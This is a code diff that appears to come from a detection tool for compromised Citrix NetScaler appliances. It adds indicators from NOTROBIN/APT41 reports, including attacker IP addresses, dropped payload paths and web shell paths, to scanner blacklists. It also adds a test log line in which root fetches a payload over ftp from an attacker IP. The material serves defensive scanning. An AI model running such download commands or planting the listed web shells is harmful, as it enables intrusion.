scanners: shell history, content: add additional blacklisted terms fr…

…om upcoming blog post

scanners/netscaler-content.sh

@@ -45,6 +45,15 @@ ns_content_blacklist[25]="198.44.227.126";
 ns_content_blacklist[26]="/tmp/l.sh";
 ns_content_blacklist[27]="Digest::MD5";
 ns_content_blacklist[28]="Could not execute command";
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+ns_content_blacklist[29]="/tmp/bsd";
+ns_content_blacklist[30]="/tmp/un";
+ns_content_blacklist[31]="66.42.98.220";
+ns_content_blacklist[32]="/var/nstmp/.nscache/prev.sh";
+ns_content_blacklist[33]="/var/nstmp/.nscache/httpd-nscache_clean";
+ns_content_blacklist[34]="/vpn/themes/imgs/tiny.php";
+ns_content_blacklist[35]="/vpn/themes/imgs/debug.php";
+ns_content_blacklist[36]="/vpn/themes/imgs/conn.php";
 
 declare -a ns_exploit_dirs;
 ns_exploit_dirs[0]="/netscaler/portal/templates/";

scanners/shell-history.sh

@@ -50,6 +50,15 @@ shell_history_blacklist[35]="157.157.87.22"
 shell_history_blacklist[36]="193.187.174.104"
 shell_history_blacklist[37]="62.113.112.33"
 shell_history_blacklist[38]="217.12.221.12"
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+shell_history_blacklist[39]="/tmp/bsd";
+shell_history_blacklist[40]="/tmp/un";
+shell_history_blacklist[41]="66.42.98.220";
+shell_history_blacklist[42]="/var/nstmp/.nscache/prev.sh";
+shell_history_blacklist[43]="/var/nstmp/.nscache/httpd-nscache_clean";
+shell_history_blacklist[44]="/vpn/themes/imgs/tiny.php";
+shell_history_blacklist[45]="/vpn/themes/imgs/debug.php";
+shell_history_blacklist[46]="/vpn/themes/imgs/conn.php";
 
 declare -a shell_history_paths;
 shell_history_paths[0]="/var/log/bash.log";

tests/shell-history/bsd/var/log/bash.log

@@ -0,0 +1 @@
+Jan 19 24:26:52 <local7.notice> ns bash[1297]: root on /dev/pts/0 shell_command="/usr/bin/ftp -o /tmp/bsd ftp://xxxxxxxxxxxxxxxxxxxxxx66.42.98.220/bsd"